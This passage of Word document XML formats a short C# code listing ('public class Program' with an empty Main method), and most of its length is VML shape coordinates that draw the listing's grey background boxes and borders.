          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>csharp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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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class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Program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12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{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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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static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void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Main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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{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15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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16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}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20.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:350" coordorigin="1490,970" coordsize="8990,350" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1007,10484,1008,10484,1009,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1019,10484,1020,10484,1021,10484,1023,10484,1024,10484,1025,10484,1027,10484,1029,10484,1030,10484,1032,10484,1034,10484,1036,10484,1038,10484,1040,10484,1042,10484,1044,10484,1046,10484,1048,10484,1051,10484,1053,10484,1056,10484,1058,10484,1061,10484,1064,10484,1067,10484,1070,10484,1073,10484,1076,10484,1079,10484,1082,10484,1086,10484,1089,10484,1092,10484,1096,10484,1100,10484,1104,10484,1108,10484,1112,10484,1116,10484,1120,10484,1124,10484,1129,10484,1133,10484,1138,10484,1142,10484,1147,10484,1152,10484,1157,10484,1162,10484,1167,10484,1173,10484,1178,10484,1184,10484,1190,10484,1195,10484,1201,10484,1207,10484,1214,10484,1220,10484,1226,10484,1233,10484,1240,10484,1246,10484,1253,10484,1260,10484,1267,10484,1275,10484,1282,10484,1290,10484,1297,10484,1305,10484,1313,10484,1321,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10483,1330,10482,1330,10482,1330,10480,1330,10479,1330,10477,1330,10475,1330,10473,1330,10470,1330,10466,1330,10462,1330,10458,1330,10453,1330,10448,1330,10442,1330,10435,1330,10428,1330,10419,1330,10411,1330,10401,1330,10391,1330,10379,1330,10367,1330,10354,1330,10340,1330,10326,1330,10310,1330,10293,1330,10275,1330,10256,1330,10236,1330,10215,1330,10192,1330,10168,1330,10143,1330,10117,1330,10090,1330,10061,1330,10031,1330,9999,1330,9966,1330,9931,1330,9895,1330,9858,1330,9819,1330,9778,1330,9735,1330,9691,1330,9646,1330,9598,1330,9549,1330,9498,1330,9445,1330,9391,1330,9334,1330,9275,1330,9215,1330,9153,1330,9088,1330,9022,1330,8953,1330,8883,1330,8810,1330,8735,1330,8658,1330,8578,1330,8497,1330,8413,1330,8326,1330,8238,1330,8146,1330,8053,1330,7957,1330,7859,1330,7758,1330,7654,1330,7548,1330,7439,1330,7328,1330,7214,1330,7097,1330,6977,1330,6855,1330,6730,1330,6602,1330,6471,1330,6337,1330,6201,1330,6061,1330,5918,1330,5773,1330,5624,1330,5472,1330,5317,1330,5159,1330,4997,1330,4833,1330,4665,1330,4494,1330,4319,1330,4141,1330,3960,1330,3776,1330,3587,1330,3396,1330,3201,1330,3002,1330,2800,1330,2594,1330,2385,1330,2172,1330,1955,1330,1734,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1329,1510,1328,1510,1328,1510,1328,1510,1328,1510,1327,1510,1327,1510,1327,1510,1326,1510,1326,1510,1325,1510,1325,1510,1324,1510,1324,1510,1323,1510,1323,1510,1322,1510,1321,1510,1321,1510,1320,1510,1319,1510,1318,1510,1317,1510,1316,1510,1315,1510,1314,1510,1313,1510,1312,1510,1311,1510,1309,1510,1308,1510,1307,1510,1305,1510,1304,1510,1302,1510,1300,1510,1299,1510,1297,1510,1295,1510,1293,1510,1291,1510,1289,1510,1287,1510,1285,1510,1283,1510,1281,1510,1278,1510,1276,1510,1273,1510,1271,1510,1268,1510,1265,1510,1262,1510,1260,1510,1257,1510,1253,1510,1250,1510,1247,1510,1244,1510,1240,1510,1237,1510,1233,1510,1229,1510,1226,1510,1222,1510,1218,1510,1214,1510,1209,1510,1205,1510,1201,1510,1196,1510,1192,1510,1187,1510,1182,1510,1177,1510,1172,1510,1167,1510,1162,1510,1156,1510,1151,1510,1145,1510,1140,1510,1134,1510,1128,1510,1122,1510,1116,1510,1109,1510,1103,1510,1096,1510,1090,1510,1083,1510,1076,1510,1069,1510,1062,1510,1054,1510,1047,1510,1039,1510,1032,1510,1024,1510,1016,1510,1008,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:330" coordorigin="1490,990" coordsize="30,330" path="m1517,999l1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1007,1517,1008,1517,1009,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1019,1517,1020,1517,1021,1517,1023,1517,1024,1517,1025,1517,1027,1517,1029,1517,1030,1517,1032,1517,1034,1517,1036,1517,1038,1517,1040,1517,1042,1517,1044,1517,1046,1517,1048,1517,1051,1517,1053,1517,1056,1517,1058,1517,1061,1517,1064,1517,1067,1517,1070,1517,1073,1517,1076,1517,1079,1517,1082,1517,1086,1517,1089,1517,1092,1517,1096,1517,1100,1517,1104,1517,1108,1517,1112,1517,1116,1517,1120,1517,1124,1517,1129,1517,1133,1517,1138,1517,1142,1517,1147,1517,1152,1517,1157,1517,1162,1517,1167,1517,1173,1517,1178,1517,1184,1517,1190,1517,1195,1517,1201,1517,1207,1517,1214,1517,1220,1517,1226,1517,1233,1517,1240,1517,1246,1517,1253,1517,1260,1517,1267,1517,1275,1517,1282,1517,1290,1517,1297,1517,1305,1517,1313,1517,1321,1517,1330e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:65.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1310" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1310;width:8990;height:370" coordorigin="1490,1310" coordsize="8990,370" path="m1510,1330l1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1510,1330,1511,1330,1512,1330,1512,1330,1514,1330,1515,1330,1517,1330,1519,1330,1521,1330,1524,1330,1528,1330,1532,1330,1536,1330,1541,1330,1546,1330,1552,1330,1559,1330,1566,1330,1575,1330,1583,1330,1593,1330,1603,1330,1615,1330,1627,1330,1640,1330,1654,1330,1668,1330,1684,1330,1701,1330,1719,1330,1738,1330,1758,1330,1780,1330,1802,1330,1826,1330,1851,1330,1877,1330,1904,1330,1933,1330,1963,1330,1995,1330,2028,1330,2063,1330,2099,1330,2136,1330,2175,1330,2216,1330,2259,1330,2303,1330,2348,1330,2396,1330,2445,1330,2496,1330,2549,1330,2604,1330,2660,1330,2719,1330,2779,1330,2841,1330,2906,1330,2972,1330,3041,1330,3112,1330,3184,1330,3259,1330,3336,1330,3416,1330,3498,1330,3582,1330,3668,1330,3757,1330,3848,1330,3941,1330,4037,1330,4136,1330,4236,1330,4340,1330,4446,1330,4555,1330,4666,1330,4780,1330,4897,1330,5017,1330,5139,1330,5264,1330,5392,1330,5523,1330,5657,1330,5793,1330,5933,1330,6076,1330,6222,1330,6370,1330,6522,1330,6677,1330,6835,1330,6997,1330,7161,1330,7329,1330,7500,1330,7675,1330,7853,1330,8034,1330,8219,1330,8407,1330,8598,1330,8793,1330,8992,1330,9194,1330,9400,1330,9609,1330,9823,1330,10039,1330,10260,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1330,10484,1331,10484,1331,10484,1331,10484,1331,10484,1331,10484,1332,10484,1332,10484,1332,10484,1333,10484,1333,10484,1333,10484,1334,10484,1334,10484,1335,10484,1335,10484,1336,10484,1337,10484,1337,10484,1338,10484,1339,10484,1340,10484,1340,10484,1341,10484,1342,10484,1343,10484,1344,10484,1346,10484,1347,10484,1348,10484,1349,10484,1350,10484,1352,10484,1353,10484,1355,10484,1356,10484,1358,10484,1360,10484,1361,10484,1363,10484,1365,10484,1367,10484,1369,10484,1371,10484,1374,10484,1376,10484,1378,10484,1381,10484,1383,10484,1386,10484,1388,10484,1391,10484,1394,10484,1397,10484,1400,10484,1403,10484,1406,10484,1409,10484,1413,10484,1416,10484,1420,10484,1423,10484,1427,10484,1431,10484,1435,10484,1439,10484,1443,10484,1448,10484,1452,10484,1456,10484,1461,10484,1466,10484,1470,10484,1475,10484,1480,10484,1485,10484,1491,10484,1496,10484,1502,10484,1507,10484,1513,10484,1519,10484,1525,10484,1531,10484,1537,10484,1543,10484,1550,10484,1556,10484,1563,10484,1570,10484,1577,10484,1584,10484,1592,10484,1599,10484,1606,10484,1614,10484,1622,10484,1630,10484,1638,10484,1646,10484,1655,10484,1663,10484,1672,10484,1681,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10483,1690,10482,1690,10482,1690,10480,1690,10479,1690,10477,1690,10475,1690,10473,1690,10470,1690,10466,1690,10462,1690,10458,1690,10453,1690,10448,1690,10442,1690,10435,1690,10428,1690,10419,1690,10411,1690,10401,1690,10391,1690,10379,1690,10367,1690,10354,1690,10340,1690,10326,1690,10310,1690,10293,1690,10275,1690,10256,1690,10236,1690,10215,1690,10192,1690,10168,1690,10143,1690,10117,1690,10090,1690,10061,1690,10031,1690,9999,1690,9966,1690,9931,1690,9895,1690,9858,1690,9819,1690,9778,1690,9735,1690,9691,1690,9646,1690,9598,1690,9549,1690,9498,1690,9445,1690,9391,1690,9334,1690,9275,1690,9215,1690,9153,1690,9088,1690,9022,1690,8953,1690,8883,1690,8810,1690,8735,1690,8658,1690,8578,1690,8497,1690,8413,1690,8326,1690,8238,1690,8146,1690,8053,1690,7957,1690,7859,1690,7758,1690,7654,1690,7548,1690,7439,1690,7328,1690,7214,1690,7097,1690,6977,1690,6855,1690,6730,1690,6602,1690,6471,1690,6337,1690,6201,1690,6061,1690,5918,1690,5773,1690,5624,1690,5472,1690,5317,1690,5159,1690,4997,1690,4833,1690,4665,1690,4494,1690,4319,1690,4141,1690,3960,1690,3776,1690,3587,1690,3396,1690,3201,1690,3002,1690,2800,1690,2594,1690,2385,1690,2172,1690,1955,1690,1734,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1689,1510,1689,1510,1689,1510,1689,1510,1689,1510,1689,1510,1689,1510,1688,1510,1688,1510,1688,1510,1688,1510,1687,1510,1687,1510,1687,1510,1686,1510,1686,1510,1685,1510,1685,1510,1684,1510,1683,1510,1683,1510,1682,1510,1681,1510,1681,1510,1680,1510,1679,1510,1678,1510,1677,1510,1676,1510,1675,1510,1674,1510,1673,1510,1672,1510,1670,1510,1669,1510,1668,1510,1666,1510,1665,1510,1663,1510,1661,1510,1660,1510,1658,1510,1656,1510,1654,1510,1652,1510,1650,1510,1648,1510,1646,1510,1644,1510,1641,1510,1639,1510,1636,1510,1634,1510,1631,1510,1628,1510,1626,1510,1623,1510,1620,1510,1617,1510,1613,1510,1610,1510,1607,1510,1603,1510,1600,1510,1596,1510,1592,1510,1588,1510,1584,1510,1580,1510,1576,1510,1572,1510,1568,1510,1563,1510,1559,1510,1554,1510,1549,1510,1544,1510,1539,1510,1534,1510,1529,1510,1523,1510,1518,1510,1512,1510,1507,1510,1501,1510,1495,1510,1489,1510,1482,1510,1476,1510,1470,1510,1463,1510,1456,1510,1449,1510,1442,1510,1435,1510,1428,1510,1421,1510,1413,1510,1405,1510,1398,1510,1390,1510,1381,1510,1373,1510,1365,1510,1356,1510,1348,1510,1339,1510,1330e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:65.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1310" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1310;width:30;height:370" coordorigin="1490,1310" coordsize="30,370" path="m1517,1330l1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1330,1517,1331,1517,1331,1517,1331,1517,1331,1517,1331,1517,1332,1517,1332,1517,1332,1517,1333,1517,1333,1517,1333,1517,1334,1517,1334,1517,1335,1517,1335,1517,1336,1517,1337,1517,1337,1517,1338,1517,1339,1517,1340,1517,1340,1517,1341,1517,1342,1517,1343,1517,1344,1517,1346,1517,1347,1517,1348,1517,1349,1517,1350,1517,1352,1517,1353,1517,1355,1517,1356,1517,1358,1517,1360,1517,1361,1517,1363,1517,1365,1517,1367,1517,1369,1517,1371,1517,1374,1517,1376,1517,1378,1517,1381,1517,1383,1517,1386,1517,1388,1517,1391,1517,1394,1517,1397,1517,1400,1517,1403,1517,1406,1517,1409,1517,1413,1517,1416,1517,1420,1517,1423,1517,1427,1517,1431,1517,1435,1517,1439,1517,1443,1517,1448,1517,1452,1517,1456,1517,1461,1517,1466,1517,1470,1517,1475,1517,1480,1517,1485,1517,1491,1517,1496,1517,1502,1517,1507,1517,1513,1517,1519,1517,1525,1517,1531,1517,1537,1517,1543,1517,1550,1517,1556,1517,1563,1517,1570,1517,1577,1517,1584,1517,1592,1517,1599,1517,1606,1517,1614,1517,1622,1517,1630,1517,1638,1517,1646,1517,1655,1517,1663,1517,1672,1517,1681,1517,1690e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:83.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1670" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1670;width:8990;height:350" coordorigin="1490,1670" coordsize="8990,350" path="m1510,1690l1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1510,1690,1511,1690,1512,1690,1512,1690,1514,1690,1515,1690,1517,1690,1519,1690,1521,1690,1524,1690,1528,1690,1532,1690,1536,1690,1541,1690,1546,1690,1552,1690,1559,1690,1566,1690,1575,1690,1583,1690,1593,1690,1603,1690,1615,1690,1627,1690,1640,1690,1654,1690,1668,1690,1684,1690,1701,1690,1719,1690,1738,1690,1758,1690,1780,1690,1802,1690,1826,1690,1851,1690,1877,1690,1904,1690,1933,1690,1963,1690,1995,1690,2028,1690,2063,1690,2099,1690,2136,1690,2175,1690,2216,1690,2259,1690,2303,1690,2348,1690,2396,1690,2445,1690,2496,1690,2549,1690,2604,1690,2660,1690,2719,1690,2779,1690,2841,1690,2906,1690,2972,1690,3041,1690,3112,1690,3184,1690,3259,1690,3336,1690,3416,1690,3498,1690,3582,1690,3668,1690,3757,1690,3848,1690,3941,1690,4037,1690,4136,1690,4236,1690,4340,1690,4446,1690,4555,1690,4666,1690,4780,1690,4897,1690,5017,1690,5139,1690,5264,1690,5392,1690,5523,1690,5657,1690,5793,1690,5933,1690,6076,1690,6222,1690,6370,1690,6522,1690,6677,1690,6835,1690,6997,1690,7161,1690,7329,1690,7500,1690,7675,1690,7853,1690,8034,1690,8219,1690,8407,1690,8598,1690,8793,1690,8992,1690,9194,1690,9400,1690,9609,1690,9823,1690,10039,1690,10260,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1690,10484,1691,10484,1691,10484,1691,10484,1691,10484,1691,10484,1691,10484,1692,10484,1692,10484,1692,10484,1693,10484,1693,10484,1693,10484,1694,10484,1694,10484,1695,10484,1695,10484,1696,10484,1696,10484,1697,10484,1698,10484,1698,10484,1699,10484,1700,10484,1701,10484,1701,10484,1702,10484,1703,10484,1704,10484,1705,10484,1707,10484,1708,10484,1709,10484,1710,10484,1712,10484,1713,10484,1714,10484,1716,10484,1717,10484,1719,10484,1721,10484,1722,10484,1724,10484,1726,10484,1728,10484,1730,10484,1732,10484,1734,10484,1737,10484,1739,10484,1741,10484,1744,10484,1746,10484,1749,10484,1751,10484,1754,10484,1757,10484,1760,10484,1763,10484,1766,10484,1769,10484,1773,10484,1776,10484,1779,10484,1783,10484,1786,10484,1790,10484,1794,10484,1798,10484,1802,10484,1806,10484,1810,10484,1814,10484,1819,10484,1823,10484,1828,10484,1833,10484,1837,10484,1842,10484,1847,10484,1853,10484,1858,10484,1863,10484,1869,10484,1874,10484,1880,10484,1886,10484,1892,10484,1898,10484,1904,10484,1910,10484,1917,10484,1923,10484,1930,10484,1937,10484,1944,10484,1951,10484,1958,10484,1965,10484,1973,10484,1980,10484,1988,10484,1996,10484,2004,10484,2012,10484,2020,10484,2020,10484,2020,10484,2020,10484,2020,10484,2020,10484,2020,10483,2020,10482,2020,10482,2020,10480,2020,10479,2020,10477,2020,10475,2020,10473,2020,10470,2020,10466,2020,10462,2020,10458,2020,10453,2020,10448,2020,10442,2020,10435,2020,10428,2020,10419,2020,10411,2020,10401,2020,10391,2020,10379,2020,10367,2020,10354,2020,10340,2020,10326,2020,10310,2020,10293,2020,10275,2020,10256,2020,10236,2020,10215,2020,10192,2020,10168,2020,10143,2020,10117,2020,10090,2020,10061,2020,10031,2020,9999,2020,9966,2020,9931,2020,9895,2020,9858,2020,9819,2020,9778,2020,9735,2020,9691,2020,9646,2020,9598,2020,9549,2020,9498,2020,9445,2020,9391,2020,9334,2020,9275,2020,9215,2020,9153,2020,9088,2020,9022,2020,8953,2020,8883,2020,8810,2020,8735,2020,8658,2020,8578,2020,8497,2020,8413,2020,8326,2020,8238,2020,8146,2020,8053,2020,7957,2020,7859,2020,7758,2020,7654,2020,7548,2020,7439,2020,7328,2020,7214,2020,7097,2020,6977,2020,6855,2020,6730,2020,6602,2020,6471,2020,6337,2020,6201,2020,6061,2020,5918,2020,5773,2020,5624,2020,5472,2020,5317,2020,5159,2020,4997,2020,4833,2020,4665,2020,4494,2020,4319,2020,4141,2020,3960,2020,3776,2020,3587,2020,3396,2020,3201,2020,3002,2020,2800,2020,2594,2020,2385,2020,2172,2020,1955,2020,1734,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2020,1510,2019,1510,2019,1510,2019,1510,2019,1510,2019,1510,2019,1510,2018,1510,2018,1510,2018,1510,2018,1510,2017,1510,2017,1510,2017,1510,2016,1510,2016,1510,2015,1510,2015,1510,2014,1510,2014,1510,2013,1510,2012,1510,2012,1510,2011,1510,2010,1510,2009,1510,2008,1510,2007,1510,2007,1510,2005,1510,2004,1510,2003,1510,2002,1510,2001,1510,2000,1510,1998,1510,1997,1510,1996,1510,1994,1510,1992,1510,1991,1510,1989,1510,1987,1510,1986,1510,1984,1510,1982,1510,1980,1510,1978,1510,1976,1510,1973,1510,1971,1510,1969,1510,1966,1510,1964,1510,1961,1510,1958,1510,1956,1510,1953,1510,1950,1510,1947,1510,1944,1510,1941,1510,1937,1510,1934,1510,1931,1510,1927,1510,1923,1510,1920,1510,1916,1510,1912,1510,1908,1510,1904,1510,1900,1510,1895,1510,1891,1510,1886,1510,1882,1510,1877,1510,1872,1510,1867,1510,1862,1510,1857,1510,1852,1510,1847,1510,1841,1510,1836,1510,1830,1510,1824,1510,1818,1510,1812,1510,1806,1510,1800,1510,1793,1510,1787,1510,1780,1510,1773,1510,1766,1510,1759,1510,1752,1510,1745,1510,1737,1510,1730,1510,1722,1510,1714,1510,1706,1510,1698,1510,1690e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:83.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1670" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:1670;width:30;height:350" coordorigin="1490,1670" coordsize="30,350" path="m1517,1690l1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1690,1517,1691,1517,1691,1517,1691,1517,1691,1517,1691,1517,1691,1517,1692,1517,1692,1517,1692,1517,1693,1517,1693,1517,1693,1517,1694,1517,1694,1517,1695,1517,1695,1517,1696,1517,1696,1517,1697,1517,1698,1517,1698,1517,1699,1517,1700,1517,1701,1517,1701,1517,1702,1517,1703,1517,1704,1517,1705,1517,1707,1517,1708,1517,1709,1517,1710,1517,1712,1517,1713,1517,1714,1517,1716,1517,1717,1517,1719,1517,1721,1517,1722,1517,1724,1517,1726,1517,1728,1517,1730,1517,1732,1517,1734,1517,1737,1517,1739,1517,1741,1517,1744,1517,1746,1517,1749,1517,1751,1517,1754,1517,1757,1517,1760,1517,1763,1517,1766,1517,1769,1517,1773,1517,1776,1517,1779,1517,1783,1517,1786,1517,1790,1517,1794,1517,1798,1517,1802,1517,1806,1517,1810,1517,1814,1517,1819,1517,1823,1517,1828,1517,1833,1517,1837,1517,1842,1517,1847,1517,1853,1517,1858,1517,1863,1517,1869,1517,1874,1517,1880,1517,1886,1517,1892,1517,1898,1517,1904,1517,1910,1517,1917,1517,1923,1517,1930,1517,1937,1517,1944,1517,1951,1517,1958,1517,1965,1517,1973,1517,1980,1517,1988,1517,1996,1517,2004,1517,2012,1517,2020e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:100.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2010" coordsize="8990,370">
